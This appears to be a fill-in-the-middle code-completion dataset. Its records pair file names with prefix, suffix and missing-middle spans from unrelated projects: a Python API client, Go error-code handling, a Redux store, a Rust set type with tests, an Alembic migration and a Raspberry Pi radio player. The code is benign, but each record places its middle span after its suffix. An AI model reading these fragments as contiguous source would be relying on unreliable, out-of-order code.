params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `update_path_api_v1_frontend_location_id_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2PasswordBearer'] # noqa: E501
return self.api_client.call_api(
'/api/v1/frontend/location/{id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Path', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| update_path_api_v1_frontend_location_id_put_with_http_info |
pgcode.go | // Copyright 2019 The Cockroach Authors.
package pgerror
import (
"strings"
"github.com/znbasedb/errors"
"github.com/znbasedb/znbase/pkg/sql/pgwire/pgcode"
)
// WithCandidateCode decorates the error with a candidate postgres
// error code. It is called "candidate" because the code is only used
// by GetPGCode() below conditionally.
// The code is considered PII-free and is thus reportable.
func WithCandidateCode(err error, code pgcode.Code) error {
if err == nil {
return nil
}
return &withCandidateCode{cause: err, code: code.String()}
}
// GetPGCodeInternal retrieves a code for the error. It operates by
// combining the inner (cause) code and the code at the current level,
// at each level of cause.
//
// - at each level:
//
// - if there is a candidate code at that level, that is used;
// - otherwise, it calls computeDefaultCode().
// if the function returns an empty string,
// pgcode.Uncategorized is used.
// An example implementation for computeDefaultCode is provided below.
//
// - after that, it combines the code computed already for the cause
// (inner) and the new code just computed at the current level (outer)
// as follows:
//
// - if the outer code is uncategorized, the inner code is kept no
// matter what.
// - if the outer code has the special XX prefix, that is kept.
// (The "XX" prefix signals importance in the pg code hierarchy.)
// - if the inner code is not uncategorized, it is retained.
// - otherwise the outer code is retained.
//
func GetPGCodeInternal(
err error, computeDefaultCode func(err error) (code pgcode.Code),
) (code pgcode.Code) {
code = pgcode.Uncategorized
if c, ok := err.(*withCandidateCode); ok {
code = pgcode.MakeCode(c.code)
} else if newCode := computeDefaultCode(err); newCode.String() != "" {
code = newCode
}
if c := errors.UnwrapOnce(err); c != nil {
innerCode := GetPGCodeInternal(c, computeDefaultCode)
code = combineCodes(innerCode, code)
}
return code
}
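// Illustrative walk-through (added for clarity, not part of the original file):
// suppose the cause carries the candidate code "42601" (a syntax error) and the
// outer wrapper carries pgcode.Uncategorized. The outer code is uncategorized,
// so the inner "42601" is kept. If the outer wrapper instead carried an
// "XX"-class code such as pgcode.Internal, that outer code would win regardless
// of what the cause reports.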
// ComputeDefaultCode looks at the current error object
// (not its causes) and returns:
// - the existing code for Error instances
// - SerializationFailure for roachpb retry errors that can be reported to clients
// - StatementCompletionUnknown for ambiguous commit errors
// - InternalError for assertion failures
// - FeatureNotSupportedError for unimplemented errors.
func ComputeDefaultCode(err error) pgcode.Code {
switch e := err.(type) {
// If there was already a pgcode in the cause, use that.
case *Error:
return e.Code
// Special roachpb errors get a special code.
case ClientVisibleRetryError:
return pgcode.SerializationFailure
case ClientVisibleAmbiguousError:
return pgcode.StatementCompletionUnknown
}
if errors.IsAssertionFailure(err) |
if errors.IsUnimplementedError(err) {
return pgcode.FeatureNotSupported
}
return pgcode.Code("")
}
// ClientVisibleRetryError mirrors roachpb.ClientVisibleRetryError but
// is defined here to avoid an import cycle.
type ClientVisibleRetryError interface {
ClientVisibleRetryError()
}
// ClientVisibleAmbiguousError mirrors
// roachpb.ClientVisibleAmbiguousError but is defined here to avoid an
// import cycle.
type ClientVisibleAmbiguousError interface {
ClientVisibleAmbiguousError()
}
// combineCodes combines the inner and outer codes.
func combineCodes(innerCode, outerCode pgcode.Code) pgcode.Code {
if outerCode == pgcode.Uncategorized {
return innerCode
}
if strings.HasPrefix(outerCode.String(), "XX") {
return outerCode
}
if innerCode != pgcode.Uncategorized {
return innerCode
}
return outerCode
}
| {
return pgcode.Internal
} |
store.js | import { configureStore } from '@reduxjs/toolkit';
import { userSlice } from '../features/userSlice';
import toastReducer from '../features/toastSlice';
import { danceSlice } from '../features/danceSlice';
import { planSlice } from '../features/planSlice';
export default configureStore({
reducer: {
user: userSlice.reducer, | },
}); | toast: toastReducer,
dance: danceSlice.reducer,
plan: planSlice.reducer, |
one_or_set.rs | // Copyright 2020-2022 IOTA Stiftung
// SPDX-License-Identifier: Apache-2.0
use core::fmt::Debug;
use core::fmt::Formatter;
use core::hash::Hash;
use core::iter;
use core::mem::replace;
use core::ops::Deref;
use core::slice::from_ref;
use serde::de;
use serde::Deserialize;
use serde::Serialize;
use identity_diff::Diff;
use identity_diff::DiffVec;
use crate::common::KeyComparable;
use crate::common::OrderedSet;
use crate::error::Error;
use crate::error::Result;
/// A generic container that stores exactly one or more unique instances of a given type.
///
/// Similar to [`OneOrMany`](crate::common::OneOrMany) except instances are guaranteed to be unique,
/// and only immutable references are allowed.
#[derive(Clone, Hash, PartialEq, Eq, PartialOrd, Ord, Deserialize, Serialize)]
#[serde(transparent)]
pub struct OneOrSet<T>(OneOrSetInner<T>)
where
T: KeyComparable;
// Private to prevent creations of empty `Set` variants.
#[derive(Clone, Debug, Hash, PartialEq, Eq, PartialOrd, Ord, Deserialize, Serialize)]
#[serde(untagged)]
enum OneOrSetInner<T>
where
T: KeyComparable,
{
/// A single instance of `T`.
One(T),
/// Multiple (one or more) unique instances of `T`.
#[serde(deserialize_with = "deserialize_non_empty_set")]
Set(OrderedSet<T>),
}
/// Deserializes an [`OrderedSet`] while enforcing that it is non-empty.
fn deserialize_non_empty_set<'de, D, T: serde::Deserialize<'de> + KeyComparable>(
deserializer: D,
) -> Result<OrderedSet<T>, D::Error>
where
D: de::Deserializer<'de>,
{
let set: OrderedSet<T> = OrderedSet::deserialize(deserializer)?;
if set.is_empty() {
return Err(de::Error::custom(Error::OneOrSetEmpty));
}
Ok(set)
}
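// Note on the wire format (illustration, mirrored from the serde tests at the bottom
// of this file): because the inner enum is `#[serde(untagged)]`, a `OneOrSet` holding
// a single numeric item serializes as the bare value `1`, while a set of three items
// serializes as the array `[1,2,3]`. Deserializing an empty array fails because
// `deserialize_non_empty_set` rejects empty sets.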
impl<T> OneOrSet<T>
where
T: KeyComparable,
{
/// Constructs a new instance with a single item.
pub fn new_one(item: T) -> Self {
Self(OneOrSetInner::One(item))
}
/// Constructs a new instance from a set of unique items.
///
/// Errors if the given set is empty.
pub fn new_set(set: OrderedSet<T>) -> Result<Self> {
if set.is_empty() {
return Err(Error::OneOrSetEmpty);
}
if set.len() == 1 {
Ok(Self::new_one(
set.into_vec().pop().expect("infallible OneOrSet new_set"),
))
} else {
Ok(Self(OneOrSetInner::Set(set)))
}
}
/// Apply a map function to convert this into a new `OneOrSet<S>`.
pub fn map<S, F>(self, mut f: F) -> OneOrSet<S>
where
S: KeyComparable,
F: FnMut(T) -> S,
{
OneOrSet(match self.0 {
OneOrSetInner::One(item) => OneOrSetInner::One(f(item)),
OneOrSetInner::Set(set_t) => {
let set_s: OrderedSet<S> = set_t.into_vec().into_iter().map(f).collect();
// Key equivalence could differ between T and S.
if set_s.len() == 1 {
OneOrSetInner::One(set_s.into_vec().pop().expect("OneOrSet::map infallible"))
} else {
OneOrSetInner::Set(set_s)
}
}
})
}
/// Apply a map function to convert this into a new `OneOrSet<S>`.
pub fn try_map<S, F, E>(self, mut f: F) -> Result<OneOrSet<S>, E>
where
S: KeyComparable,
F: FnMut(T) -> Result<S, E>,
{
Ok(OneOrSet(match self.0 {
OneOrSetInner::One(item) => OneOrSetInner::One(f(item)?),
OneOrSetInner::Set(set_t) => {
let set_s: OrderedSet<S> = set_t
.into_vec()
.into_iter()
.map(f)
.collect::<Result<OrderedSet<S>, E>>()?;
// Key equivalence could differ between T and S.
if set_s.len() == 1 {
OneOrSetInner::One(set_s.into_vec().pop().expect("OneOrSet::try_map infallible"))
} else {
OneOrSetInner::Set(set_s)
}
}
}))
}
/// Returns the number of elements in the collection.
#[allow(clippy::len_without_is_empty)]
pub fn len(&self) -> usize {
match &self.0 {
OneOrSetInner::One(_) => 1,
OneOrSetInner::Set(inner) => inner.len(),
}
}
/// Returns a reference to the element at the given index.
pub fn get(&self, index: usize) -> Option<&T> {
match &self.0 {
OneOrSetInner::One(inner) if index == 0 => Some(inner),
OneOrSetInner::One(_) => None,
OneOrSetInner::Set(inner) => inner.get(index),
}
}
/// Returns `true` if the collection contains the given item's key.
pub fn contains<U>(&self, item: &U) -> bool
where
T: KeyComparable,
U: KeyComparable<Key = T::Key>,
{
match &self.0 {
OneOrSetInner::One(inner) => inner.key() == item.key(),
OneOrSetInner::Set(inner) => inner.contains(item),
}
}
/// Appends a new item to the end of the collection if its key is not present already.
///
/// Returns whether or not the value was successfully inserted.
pub fn append(&mut self, item: T) -> bool
where
T: KeyComparable,
{
match &mut self.0 {
OneOrSetInner::One(inner) if inner.key() == item.key() => false,
OneOrSetInner::One(_) => match replace(&mut self.0, OneOrSetInner::Set(OrderedSet::new())) {
OneOrSetInner::One(inner) => {
self.0 = OneOrSetInner::Set(OrderedSet::from_iter([inner, item].into_iter()));
true
}
OneOrSetInner::Set(_) => unreachable!(),
},
OneOrSetInner::Set(inner) => inner.append(item),
}
}
/// Returns an `Iterator` that yields items from the collection.
pub fn iter(&self) -> impl Iterator<Item = &T> + '_ {
OneOrSetIter::new(self)
}
/// Returns a reference to the contents as a slice.
pub fn as_slice(&self) -> &[T] {
&*self
}
/// Consumes the [`OneOrSet`] and returns the contents as a [`Vec`].
pub fn into_vec(self) -> Vec<T> {
match self.0 {
OneOrSetInner::One(inner) => vec![inner],
OneOrSetInner::Set(inner) => inner.into_vec(),
}
}
}
impl<T> Debug for OneOrSet<T>
where
T: Debug + KeyComparable,
{
fn fmt(&self, f: &mut Formatter<'_>) -> core::fmt::Result {
match &self.0 {
OneOrSetInner::One(inner) => Debug::fmt(inner, f),
OneOrSetInner::Set(inner) => Debug::fmt(inner, f),
}
}
}
impl<T> Deref for OneOrSet<T>
where
T: KeyComparable,
{
type Target = [T];
fn deref(&self) -> &Self::Target {
match &self.0 {
OneOrSetInner::One(inner) => from_ref(inner),
OneOrSetInner::Set(inner) => inner.as_slice(),
}
}
}
impl<T> AsRef<[T]> for OneOrSet<T>
where
T: KeyComparable,
{
fn as_ref(&self) -> &[T] {
self.as_slice()
}
}
impl<T> From<T> for OneOrSet<T>
where
T: KeyComparable,
{
fn from(other: T) -> Self {
OneOrSet::new_one(other)
}
}
impl<T> TryFrom<Vec<T>> for OneOrSet<T>
where
T: KeyComparable,
{
type Error = Error;
fn try_from(other: Vec<T>) -> std::result::Result<Self, Self::Error> {
let set: OrderedSet<T> = OrderedSet::try_from(other)?;
OneOrSet::new_set(set)
}
}
impl<T> TryFrom<OrderedSet<T>> for OneOrSet<T>
where
T: KeyComparable,
{
type Error = Error;
fn try_from(other: OrderedSet<T>) -> std::result::Result<Self, Self::Error> {
OneOrSet::new_set(other)
}
}
impl<T> From<OneOrSet<T>> for Vec<T>
where
T: KeyComparable,
{
fn from(other: OneOrSet<T>) -> Self {
other.into_vec()
}
}
impl<T> From<OneOrSet<T>> for OrderedSet<T>
where
T: KeyComparable,
{
fn from(other: OneOrSet<T>) -> Self {
match other.0 {
OneOrSetInner::One(item) => OrderedSet::from_iter(iter::once(item)),
OneOrSetInner::Set(set) => set,
}
}
}
impl<T> Diff for OneOrSet<T>
where
T: Diff + KeyComparable + Serialize + for<'de> Deserialize<'de>,
{
type Type = DiffVec<T>;
fn diff(&self, other: &Self) -> identity_diff::Result<Self::Type> {
self.clone().into_vec().diff(&other.clone().into_vec())
}
fn merge(&self, diff: Self::Type) -> identity_diff::Result<Self> {
self
.clone()
.into_vec()
.merge(diff)
.and_then(|this| Self::try_from(this).map_err(identity_diff::Error::merge))
}
fn from_diff(diff: Self::Type) -> identity_diff::Result<Self> {
Vec::from_diff(diff).and_then(|this| Self::try_from(this).map_err(identity_diff::Error::convert))
}
fn into_diff(self) -> identity_diff::Result<Self::Type> {
self.into_vec().into_diff()
}
}
// =============================================================================
// Iterator
// =============================================================================
struct OneOrSetIter<'a, T>
where
T: KeyComparable,
{
inner: &'a OneOrSet<T>,
index: usize,
}
impl<'a, T> OneOrSetIter<'a, T>
where
T: KeyComparable,
{
fn new(inner: &'a OneOrSet<T>) -> Self {
Self { inner, index: 0 }
}
}
impl<'a, T> Iterator for OneOrSetIter<'a, T>
where
T: KeyComparable,
{
type Item = &'a T;
fn next(&mut self) -> Option<Self::Item> {
self.index += 1;
self.inner.get(self.index - 1)
}
}
#[cfg(test)]
mod tests {
use crate::convert::FromJson;
use crate::convert::ToJson;
use super::*;
#[derive(Clone, Debug, PartialEq, Eq, Serialize, Deserialize)]
struct MockKeyU8(u8);
#[derive(Clone, Debug, PartialEq, Eq, Serialize, Deserialize)]
struct MockKeyBool(bool);
impl KeyComparable for MockKeyU8 {
type Key = u8;
fn key(&self) -> &Self::Key {
&self.0
}
}
impl KeyComparable for MockKeyBool {
type Key = bool;
fn key(&self) -> &Self::Key {
&self.0
}
}
#[test]
fn test_new_set() {
// VALID: non-empty set.
let ordered_set: OrderedSet<MockKeyU8> = OrderedSet::from_iter([1, 2, 3].map(MockKeyU8).into_iter());
let new_set: OneOrSet<MockKeyU8> = OneOrSet::new_set(ordered_set.clone()).unwrap();
let try_from_set: OneOrSet<MockKeyU8> = OneOrSet::try_from(ordered_set.clone()).unwrap();
assert_eq!(new_set, try_from_set);
assert_eq!(OrderedSet::from(new_set), ordered_set);
// INVALID: empty set.
let empty: OrderedSet<MockKeyU8> = OrderedSet::new();
assert!(matches!(OneOrSet::new_set(empty.clone()), Err(Error::OneOrSetEmpty)));
assert!(matches!(OneOrSet::try_from(empty), Err(Error::OneOrSetEmpty)));
}
#[test]
fn test_append_from_one() {
let mut collection: OneOrSet<MockKeyU8> = OneOrSet::new_one(MockKeyU8(42));
assert_eq!(collection.len(), 1);
// Ignores duplicates.
collection.append(MockKeyU8(42));
assert_eq!(collection, OneOrSet::new_one(MockKeyU8(42)));
assert_eq!(collection.len(), 1);
// Becomes Set.
collection.append(MockKeyU8(128));
assert_eq!(
collection,
OneOrSet::new_set(OrderedSet::from_iter([42, 128].map(MockKeyU8).into_iter())).unwrap()
);
assert_eq!(collection.len(), 2);
collection.append(MockKeyU8(200));
assert_eq!(
collection,
OneOrSet::new_set(OrderedSet::from_iter([42, 128, 200].map(MockKeyU8).into_iter())).unwrap()
);
assert_eq!(collection.len(), 3);
}
#[test]
fn test_append_from_set() {
let mut collection: OneOrSet<MockKeyU8> = OneOrSet::new_set((0..42).map(MockKeyU8).collect()).unwrap();
assert_eq!(collection.len(), 42);
// Appends to end.
collection.append(MockKeyU8(42));
let expected: OneOrSet<MockKeyU8> = OneOrSet::new_set((0..=42).map(MockKeyU8).collect()).unwrap();
assert_eq!(collection, expected);
assert_eq!(collection.len(), 43);
// Ignores duplicates.
for i in 0..=42 {
collection.append(MockKeyU8(i));
assert_eq!(collection, expected);
assert_eq!(collection.len(), 43);
}
}
#[test]
fn test_contains() {
// One.
let one: OneOrSet<MockKeyU8> = OneOrSet::new_one(MockKeyU8(1));
assert!(one.contains(&1));
assert!(!one.contains(&2));
assert!(!one.contains(&3));
// Set.
let set: OneOrSet<MockKeyU8> = OneOrSet::new_set((1..=3).map(MockKeyU8).collect()).unwrap();
assert!(set.contains(&1));
assert!(set.contains(&2));
assert!(set.contains(&3));
assert!(!set.contains(&4));
}
#[test]
fn test_get() {
// One.
let one: OneOrSet<MockKeyU8> = OneOrSet::new_one(MockKeyU8(1));
assert_eq!(one.get(0), Some(&MockKeyU8(1)));
assert_eq!(one.get(1), None);
assert_eq!(one.get(2), None);
// Set.
let set: OneOrSet<MockKeyU8> = OneOrSet::new_set((1..=3).map(MockKeyU8).collect()).unwrap();
assert_eq!(set.get(0), Some(&MockKeyU8(1)));
assert_eq!(set.get(1), Some(&MockKeyU8(2)));
assert_eq!(set.get(2), Some(&MockKeyU8(3)));
assert_eq!(set.get(3), None);
}
#[test]
fn test_map() {
// One.
let one: OneOrSet<MockKeyU8> = OneOrSet::new_one(MockKeyU8(1));
let one_add: OneOrSet<MockKeyU8> = one.map(|item| MockKeyU8(item.0 + 1));
assert_eq!(one_add, OneOrSet::new_one(MockKeyU8(2)));
// Set.
let set: OneOrSet<MockKeyU8> = OneOrSet::new_set((1..=3).map(MockKeyU8).collect()).unwrap();
let set_add: OneOrSet<MockKeyU8> = set.map(|item| MockKeyU8(item.0 + 10));
assert_eq!(set_add, OneOrSet::new_set((11..=13).map(MockKeyU8).collect()).unwrap());
// Set reduced to one.
let set_many: OneOrSet<MockKeyU8> = OneOrSet::new_set([2, 4, 6, 8].into_iter().map(MockKeyU8).collect()).unwrap();
assert_eq!(set_many.len(), 4);
let set_bool: OneOrSet<MockKeyBool> = set_many.map(|item| MockKeyBool(item.0 % 2 == 0));
assert_eq!(set_bool, OneOrSet::new_one(MockKeyBool(true)));
assert_eq!(set_bool.0, OneOrSetInner::One(MockKeyBool(true)));
assert_eq!(set_bool.len(), 1);
}
#[test]
fn test_try_map() {
// One - OK
let one: OneOrSet<MockKeyU8> = OneOrSet::new_one(MockKeyU8(1));
let one_add: OneOrSet<MockKeyU8> = one
.try_map(|item| {
if item.key() == &1 {
Ok(MockKeyU8(item.0 + 1))
} else {
Err(Error::OneOrSetEmpty)
}
})
.unwrap();
assert_eq!(one_add, OneOrSet::new_one(MockKeyU8(2)));
// One - ERROR
let one_err: OneOrSet<MockKeyU8> = OneOrSet::new_one(MockKeyU8(1));
let result_one: Result<OneOrSet<MockKeyBool>> = one_err.try_map(|item| {
if item.key() == &1 {
Err(Error::OneOrSetEmpty)
} else {
Ok(MockKeyBool(false))
}
});
assert!(matches!(result_one, Err(Error::OneOrSetEmpty)));
// Set - OK
let set: OneOrSet<MockKeyU8> = OneOrSet::new_set((1..=3).map(MockKeyU8).collect()).unwrap();
let set_add: OneOrSet<MockKeyU8> = set
.try_map(|item| {
if item.key() < &4 {
Ok(MockKeyU8(item.0 + 10))
} else {
Err(Error::OneOrSetEmpty)
}
})
.unwrap();
assert_eq!(set_add, OneOrSet::new_set((11..=13).map(MockKeyU8).collect()).unwrap());
// Set - ERROR
let set_err: OneOrSet<MockKeyU8> = OneOrSet::new_set((1..=3).map(MockKeyU8).collect()).unwrap();
let result_set: Result<OneOrSet<MockKeyU8>> = set_err.try_map(|item| {
if item.key() < &4 {
Err(Error::OneOrSetEmpty)
} else {
Ok(MockKeyU8(item.0))
}
});
assert!(matches!(result_set, Err(Error::OneOrSetEmpty)));
// Set reduced to one - OK
let set_many: OneOrSet<MockKeyU8> = OneOrSet::new_set([2, 4, 6, 8].into_iter().map(MockKeyU8).collect()).unwrap();
assert_eq!(set_many.len(), 4);
let set_bool: OneOrSet<MockKeyBool> = set_many
.try_map(|item| { | } else {
Err(Error::OneOrSetEmpty)
}
})
.unwrap();
assert_eq!(set_bool, OneOrSet::new_one(MockKeyBool(true)));
assert_eq!(set_bool.0, OneOrSetInner::One(MockKeyBool(true)));
assert_eq!(set_bool.len(), 1);
}
#[test]
fn test_iter() {
// One.
let one: OneOrSet<MockKeyU8> = OneOrSet::new_one(MockKeyU8(1));
let mut one_iter = one.iter();
assert_eq!(one_iter.next(), Some(&MockKeyU8(1)));
assert_eq!(one_iter.next(), None);
assert_eq!(one_iter.next(), None);
// Set.
let set: OneOrSet<MockKeyU8> = OneOrSet::new_set((1..=3).map(MockKeyU8).collect()).unwrap();
let mut set_iter = set.iter();
assert_eq!(set_iter.next(), Some(&MockKeyU8(1)));
assert_eq!(set_iter.next(), Some(&MockKeyU8(2)));
assert_eq!(set_iter.next(), Some(&MockKeyU8(3)));
assert_eq!(set_iter.next(), None);
}
#[test]
fn test_serde() {
// VALID: one.
{
let one: OneOrSet<MockKeyU8> = OneOrSet::new_one(MockKeyU8(1));
let ser: String = one.to_json().unwrap();
let de: OneOrSet<MockKeyU8> = OneOrSet::from_json(&ser).unwrap();
assert_eq!(ser, "1");
assert_eq!(de, one);
}
// VALID: set.
{
let set: OneOrSet<MockKeyU8> = OneOrSet::new_set((1..=3).map(MockKeyU8).collect()).unwrap();
let ser: String = set.to_json().unwrap();
let de: OneOrSet<MockKeyU8> = OneOrSet::from_json(&ser).unwrap();
assert_eq!(ser, "[1,2,3]");
assert_eq!(de, set);
}
// INVALID: empty.
{
let empty: Result<OneOrSet<MockKeyU8>> = OneOrSet::from_json("");
assert!(empty.is_err());
let empty_set: Result<OneOrSet<MockKeyU8>> = OneOrSet::from_json("[]");
assert!(empty_set.is_err());
let empty_space: Result<OneOrSet<MockKeyU8>> = OneOrSet::from_json("[ ]");
assert!(empty_space.is_err());
}
}
} | if item.key() % 2 == 0 {
Ok(MockKeyBool(item.0 % 2 == 0)) |
7b0843b4944f_.py | """empty message
Revision ID: 7b0843b4944f
Revises: a83fe752a741
Create Date: 2016-08-08 23:12:27.138166
"""
# revision identifiers, used by Alembic.
revision = '7b0843b4944f'
down_revision = 'a83fe752a741'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('order_header',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('date_created', sa.DateTime(), nullable=True),
sa.Column('date_modified', sa.DateTime(), nullable=True),
sa.Column('title', sa.Text(), nullable=False),
sa.PrimaryKeyConstraint('id')
)
op.create_table('order_line',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('date_created', sa.DateTime(), nullable=True),
sa.Column('date_modified', sa.DateTime(), nullable=True),
sa.Column('request', sa.Text(), nullable=False),
sa.Column('order_id', sa.Integer(), nullable=True),
sa.Column('order_for', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['order_for'], ['users.id'], ),
sa.ForeignKeyConstraint(['order_id'], ['order_header.id'], name='order_id_fkey'),
sa.PrimaryKeyConstraint('id')
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
| op.drop_table('order_line')
op.drop_table('order_header')
### end Alembic commands ### |
|
key_values.go | package web
import (
"container/list"
"fmt"
)
// KeyValues is a utility that makes it more convenient to build key-value pairs.
type KeyValues map[string]interface{}
// NewKeyValues returns a new KeyValues instance.
// Example:
// keyValues := NewKeyValues(
// "key1", 1,
// "key2", "key2value",
// "key3", 1.23456
// )
func | (params ...interface{}) (*KeyValues, error) {
if len(params)%2 != 0 {
return nil, fmt.Errorf("length of key-values must be even.")
}
vp := &KeyValues{}
for i := 0; i < len(params); i += 2 {
k := params[i]
v := params[i+1]
strKey, ok := k.(string)
if !ok {
return nil, fmt.Errorf("key must be string: %v", k)
}
switch v.(type) {
case string:
vp.PutString(strKey, v.(string))
case int:
vp.PutInt(strKey, v.(int))
case float64:
vp.PutFloat(strKey, v.(float64))
case *list.List:
vp.PutList(strKey, v.(*list.List))
default:
return nil, fmt.Errorf("unknown walue type: %v", v)
}
}
return vp, nil
}
// PutString puts a key-value pair and the value's type is string.
func (vp *KeyValues) PutString(k string, v string) {
(*vp)[k] = v
}
// PutInt puts a key-value pair and the value's type is int.
func (vp *KeyValues) PutInt(k string, v int) {
(*vp)[k] = v
}
// PutFloat puts a key-value pair and the value's type is float64.
func (vp *KeyValues) PutFloat(k string, v float64) {
(*vp)[k] = v
}
// PutList puts a key-value pair and the value's type is *list.List.
func (vp *KeyValues) PutList(k string, v *list.List) {
(*vp)[k] = v
}
// GetKeys returns the keys of the KeyValues object.
func (vp *KeyValues) GetKeys() []string {
result := []string{}
for k := range *vp {
result = append(result, k)
}
return result
}
// Get the value by key.
func (vp *KeyValues) Get(k string) (interface{}, error) {
v, ok := (*vp)[k]
if ok {
return v, nil
}
return v, fmt.Errorf("can't find key: %s", k)
}
// GetAsString gets the value by key and converts it to a string;
// it returns an error if the conversion fails.
func (vp *KeyValues) GetAsString(k string) (string, error) {
v, err := vp.Get(k)
if err != nil {
return "", err
}
switch v.(type) {
case string:
s, _ := v.(string)
return s, nil
case int:
i, _ := v.(int)
return fmt.Sprintf("%d", i), nil
case float64:
f, _ := v.(float64)
return fmt.Sprintf("%f", f), nil
}
return "", fmt.Errorf("GetAsString: invalid walue type. key=%s", k)
}
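// Example (illustrative): for a KeyValues built with NewKeyValues("count", 1, "ratio", 1.5),
// GetAsString("count") returns "1" and GetAsString("ratio") returns "1.500000"
// (float values are formatted with %f).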
// GetAsList gets the value by key and converts it to a *list.List;
// it returns an error if the conversion fails.
func (vp *KeyValues) GetAsList(k string) (*list.List, error) {
v, err := vp.Get(k)
if err != nil {
return nil, err
}
l, ok := v.(*list.List)
if !ok {
return nil, fmt.Errorf("GetAsList: invalid value type. key=%s", k)
}
return l, nil
}
| NewKeyValues |
piradio.go | package main
import (
"bufio"
"errors"
"flag"
"fmt"
"io"
"io/ioutil"
"net"
"net/http"
"os"
"os/exec"
"os/signal"
"os/user"
"path/filepath"
"regexp"
"strconv"
"strings"
"sync"
"syscall"
"time"
"github.com/aluedtke7/piradio/debouncer"
"github.com/aluedtke7/piradio/display"
"github.com/aluedtke7/piradio/lcd"
"github.com/aluedtke7/piradio/oled"
"github.com/antigloss/go/logger"
"periph.io/x/periph/conn/gpio"
"periph.io/x/periph/conn/gpio/gpioreg"
"periph.io/x/periph/host"
)
const (
debounceTime = 100
debounceWriteToFileTime = 15
defVolumeAnalog = "55"
defVolumeBluetooth = "35"
)
var (
disp display.Display
readyForMplayer bool
bluetoothConnected bool
debug *bool
camelCasePtr *bool
noisePtr *bool
oledPtr *bool
noBluetoothPtr *bool
backlightOffPtr *bool
backlightOffTimePtr *int
scrollStationPtr *bool
lcdDelayPtr *int
scrollSpeedPtr *int
stations []radioStation
stationIdx = -1
btDevices []string
bitrate string
volume string
volumeAnalog string
volumeBluetooth string
muted bool
charsPerLine int
command *exec.Cmd
inPipe io.WriteCloser
outPipe io.ReadCloser
pipeChan = make(chan io.ReadCloser)
ipAddress string
homePath string
currentStation string
debounceWrite func(f func())
debounceBacklight func(f func())
stationMutex = &sync.Mutex{}
charMap = map[string]string{"'": "'", "´": "'", "á": "a", "é": "e", "ê": "e", "è": "e", "í": "i", "à": "a",
"ä": "ae", "Ä": "Ae", "ö": "oe", "Ö": "Oe", "ü": "ue", "Ü": "Ue", "ß": "ss", "…": "...", "Ó": "O", "ó": "o",
"õ": "o", "ñ": "n", "ó": "o", "ø": "o", "É": "E"}
)
// holds a Radio Station name and url
type radioStation struct {
name string
url string
}
// helper for error checking
func check(err error) {
if err != nil {
logger.Error(err.Error())
logger.Error(errors.Unwrap(fmt.Errorf("Wrapped error: %w", err)).Error())
}
}
// logs the IPv4 addresses found and stores the first non-localhost address in the variable 'ipAddress'
func logNetworkInterfaces() {
interfaces, err := net.Interfaces()
if err != nil {
logger.Error(err.Error())
return
}
reg := regexp.MustCompile("^((25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9]?[0-9])")
for _, i := range interfaces {
byName, err := net.InterfaceByName(i.Name)
if err != nil {
logger.Warn(err.Error())
}
err = nil
addresses, err := byName.Addrs()
for _, v := range addresses {
ipv4 := v.String()
if reg.MatchString(ipv4) {
logger.Trace(ipv4)
if strings.Index(ipv4, "127.0.") != 0 {
idx := strings.Index(ipv4, "/")
if idx > 0 {
ipAddress = ipv4[0:idx]
} else {
ipAddress = ipv4
}
}
}
}
}
}
// checks if a given string contains only lowercase or special characters. It is used for the conversion to
// camel case: strings that are already all lowercase will not be 'camel-cased'.
func isOnlyLowerCase(text string) bool {
const chars = "0123456789abcdefghijklmnopqrstuvwxyz.+-*/%&!# _,;:()[]{}"
for _, c := range text {
if !strings.Contains(chars, string(c)) {
return false
}
}
return true
}
// removes characters/runes that cannot be displayed on the LCD/OLED. These displays can only show ASCII
// characters, so 'charMap' provides the best possible translation. When the flag 'camelCase' is set to true,
// every string that is not purely lowercase is converted to camel case format.
func beautify(text string) string {
var b strings.Builder
for _, runeValue := range text {
s := charMap[string(runeValue)]
if s == "" {
if runeValue < 32 || runeValue > 126 {
logger.Trace("Illegal rune:", runeValue, string(runeValue))
} else {
b.WriteRune(runeValue)
}
} else {
b.WriteString(s)
}
}
text = b.String()
if *camelCasePtr {
if !isOnlyLowerCase(text) {
cct := strings.Title(strings.ToLower(text))
idx := strings.Index(cct, "'")
if idx > 0 && idx < len(cct)-1 {
cct = cct[:idx+1] + strings.ToLower(string(cct[idx+1])) + cct[idx+2:]
}
return cct
}
}
return text
}
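// Example (illustrative, using the charMap defined above): beautify("Müller Café")
// yields "Mueller Cafe". With the camel-case option enabled, a title such as
// "RADIO BOB!" becomes "Radio Bob!", while purely lowercase strings are left as-is.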
func printLine(line int, text string, scroll bool, doNotBeautify ...bool) {
t := strings.TrimSpace(text)
if len(doNotBeautify) < 1 {
t = beautify(t)
}
if line == 2 && *noisePtr {
t = removeNoise(t)
}
disp.PrintLine(line, t, scroll)
}
func fileExists(name string) bool {
if _, err := os.Stat(name); err != nil {
if os.IsNotExist(err) {
return false
}
}
return true
}
func getHomeDir() string {
usr, err := user.Current()
if err != nil {
return "~/"
}
return usr.HomeDir
}
// returns the index of the last used station and the volume levels
func getStationAndVolumes() (idx int, volAnalog string, volBt string) {
fileName := filepath.Join(homePath, "last_values")
content, err := ioutil.ReadFile(fileName)
if err != nil {
idx = 0
volAnalog = defVolumeAnalog
volBt = defVolumeBluetooth
} else {
contentArr := strings.Split(strings.Trim(string(content), " "), "\n")
